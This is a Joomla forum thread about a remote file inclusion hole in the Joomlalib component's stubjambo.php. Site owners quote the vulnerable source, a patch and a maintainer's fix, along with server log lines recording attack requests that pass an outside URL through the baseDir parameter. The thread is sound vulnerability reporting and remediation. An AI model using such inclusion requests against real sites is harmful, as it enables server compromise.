Remote File Inclusion: Joomlalib - All versions

dazzor · **Joined:** Mon Jun 05, 2006 2:04 pm **Posts:** 16

Hi,

my provider has sand me an email with the message there was a hack attempt on the server true my site.
according to the log 'the hacker' included an external URL in stubjambo.php.

What can i do about this?

is use joomla 1.0.13
latest php and mysql

infograf768 · **Posted:** Tue Sep 18, 2007 9:55 am

Hack attempt does not mean the crack has been done.
Please ask your provider to quote the log concerning this.
Also, which version of Joomlalib and/or bsq_sitestats are you using?

dazzor · **Joined:** Mon Jun 05, 2006 2:04 pm **Posts:** 16

log:

Quote:

scoutingranst.be 211.175.61.131 - - [18/Sep/2007:01:09:27 +0200] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.freewe
btown.com/v3nom/id.txt? HTTP/1.1" 200 52 "-" "libwww-perl/5.79"

i have no idea what version of Joomlalib or bsq_sitestats, the one that comes with Joomla 1.0.12

infograf768 · **Posted:** Tue Sep 18, 2007 1:42 pm

They do not come with Joomla. These are 3rd party extensions.

dazzor · **Joined:** Mon Jun 05, 2006 2:04 pm **Posts:** 16

ah, but i still have no idea. Any idea where i can find this?

RussW · **Posted:** Wed Sep 19, 2007 6:47 am

Please log in to your Joomla! Administrator site, list the components and there you will see the versions of the installed items and their appropriate authoers websites. Check on the authors websites for updates and/or known exploits, also check their forums for similar problems, these are not core Joomla! extensions.

Protozoan · **Joined:** Fri Oct 06, 2006 12:10 am **Posts:** 4

Affected component:
Joomlalib (necessary for the Gallery2 component)

The log file:
x - - [19/Sep/2007:00:21:00 +0200] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://xxxx/tmp/echo3? HTTP/1.1" 200 924 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"

File contains:

Code:

<?
/** Create a Joomla/Mambo environment for our example programs 
 * @package examples 
 */
$baseDir = dirname(__FILE__) . '/';   
/** */   
define('_VALID_MOS', 1); //Pretend we're Joomla
require_once($baseDir.'../../../globals.php');
require_once($baseDir.'../../../configuration.php');
require_once($baseDir .'../../../includes/mambo.php');
$database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix );

$GLOBALS['database'] = $database;
?>

What do you guys suggest as fix?

infograf768 · **Posted:** Thu Sep 20, 2007 4:11 am

Merging with similar thread.
Looks like joomlalib is indeed at stake.

55thinking · **Posted:** Thu Sep 20, 2007 8:23 am

is there a fix available ?

We affected...and we are not using the mentionned component, it got injected in our install

amacide · **Joined:** Thu Sep 20, 2007 10:36 am **Posts:** 1

Hi,

This is actively being exploited. I don't think the affected file
is normally used if at all - others may be able to confirm...

Unfortunately the exploited $baseDir affects Joomla further
along the processing so fixing in this file not seem to help.

If $baseDir is set in request, then abort going no further.
This may break your sites - works fine for me.

Code:

if(isset($_REQUEST['baseDir'])) { return FALSE;}

Cheers,

Code:

<?
/** Create a Joomla/Mambo environment for our example programs 
 * @package examples 
 */}
if(isset($_REQUEST['baseDir'])) { return FALSE;}

$baseDir = dirname(__FILE__) . '/';     
/** */  
define('_VALID_MOS', 1); //Pretend we're Joomla
require_once($baseDir.'../../../globals.php');
require_once($baseDir.'../../../configuration.php');
require_once($baseDir .'../../../includes/mambo.php');
$database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix );

$GLOBALS['database'] = $database;
?>

Protozoan · **Joined:** Fri Oct 06, 2006 12:10 am **Posts:** 4

amacide wrote:

Hi,

This is actively being exploited. I don't think the affected file
is normally used if at all - others may be able to confirm...

Unfortunately the exploited $baseDir affects Joomla further
along the processing so fixing in this file not seem to help.

If $baseDir is set in request, then abort going no further.
This may break your sites - works fine for me.

Code:

if(isset($_REQUEST['baseDir'])) { return FALSE;}

Cheers,

Code:

<?
/** Create a Joomla/Mambo environment for our example programs 
 * @package examples 
 */}
if(isset($_REQUEST['baseDir'])) { return FALSE;}

$baseDir = dirname(__FILE__) . '/';     
/** */  
define('_VALID_MOS', 1); //Pretend we're Joomla
require_once($baseDir.'../../../globals.php');
require_once($baseDir.'../../../configuration.php');
require_once($baseDir .'../../../includes/mambo.php');
$database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix );

$GLOBALS['database'] = $database;
?>

Fix works here without complications. Thanks for your quick response.

hamsel · **Joined:** Sun Oct 30, 2005 1:39 am **Posts:** 19

This is certainly at risk! If the injected php code is to be believed, the attack goes way beyond the individual site being hacked for phishing purposes and right into the host's system accounts.

I've sent a copy of the injected code to infograf678 - I hope he will comment on the code here, if he gets the time...

/hamsel

infograf768 · **Posted:** Sat Sep 22, 2007 8:32 am

Sending mails around...

trompete · **Posted:** Sat Sep 22, 2007 2:19 pm

Hi,

Infograf was nice enough to make me aware of this vulnerability. I don't think this file is being used either. I'll do a code review since it's been 9 months since I looked at it (life > internet). I'll release a new package with this file removed as soon as I can.

Brent

trompete · **Posted:** Sat Sep 22, 2007 2:25 pm

Where did JoomlaLib and BSQ go on the extensions site? That wasn't very nice.

trompete · **Posted:** Sat Sep 22, 2007 2:40 pm

I posted a new version here:
http://joomlacode.org/gf/project/joomlalib/frs/

I still can't find the extension site entries to update them, but here's the fixed version.

infograf768 · **Posted:** Sat Sep 22, 2007 2:49 pm

Brent,
Thanks for your fast reply.
JED admins took it off until fix made. Usual policy. We were very much worrying this morning about these reports

BSQ sitestats is concerned but also the Gallery2 extension I guess.

Please let ot2sen (Ole) know when you have uploaded new versions on joomlacode for the components too.
JM

ot2sen · **Posted:** Sat Sep 22, 2007 3:25 pm

trompete wrote:

I posted a new version here:
http://joomlacode.org/gf/project/joomlalib/frs/

I still can't find the extension site entries to update them, but here's the fixed version.

BSQ and Gallery2Bridge published again. Feel welcomed to update descriptions and version info. Thanks

dracula · **Joined:** Sun Dec 04, 2005 2:48 am **Posts:** 5

I have posted the problem in the dev forum of joomlalib, so I will just post here the link the their forum.
[url=http://forum.4theweb.nl/showthread.php?p=5020#post5020]
http://forum.4theweb.nl/showthread.php?p=5020#post5020[/url]

From my point of view, the newest joomlalib is also affected!

infograf768 · **Posted:** Tue Oct 09, 2007 1:47 pm

Moving to the related thread.

infograf768 · **Posted:** Tue Oct 09, 2007 1:48 pm

@trompete

Can you look into that?

trompete · **Posted:** Tue Oct 09, 2007 1:52 pm

Later. It's office hours here in the USA. I should be able to look at 8 PM CST (GMT - 6)

Michiel_1981 · **Joined:** Sun Aug 28, 2005 6:38 am **Posts:** 71

infograf768 wrote:

@trompete

Can you look into that?

Just looked into this with trompete, and there is NO know include like this in the code anymore, we emptied the file completly in the latest release.

so post complete file content and file name! So we can look into this.

kind regards,
Michiel

EDIT: forgot 1 word

infograf768 · **Posted:** Tue Oct 09, 2007 2:25 pm

Thanks folks.

dracula · **Joined:** Sun Dec 04, 2005 2:48 am **Posts:** 5

thanks. didn't see this topic. and the latest link I found on 4theweb.nl was going to a 1.3.1 version which still had the problem.

geoffjones · **Joined:** Thu Feb 19, 2009 2:23 pm **Posts:** 13

Just looked at my error logs and this exploit is still being tried. Found the source from 4 origins, just in one day:
[RussW IP Addresses Removed, pointless exercise, these could be other compromised sites, via proxies or hijaked, the IP Address potentially mean nothing and do not assist with issue diagnosis or resolution ]

Put these in http://ip-address-lookup-v4.com/ to see their origins!!!!!!!!!!

I am running 1.0.15, and this directory/file does not reside on my website.

Joomla! Discussion Forums

Remote File Inclusion: Joomlalib - All versions

Quick reply

Who is online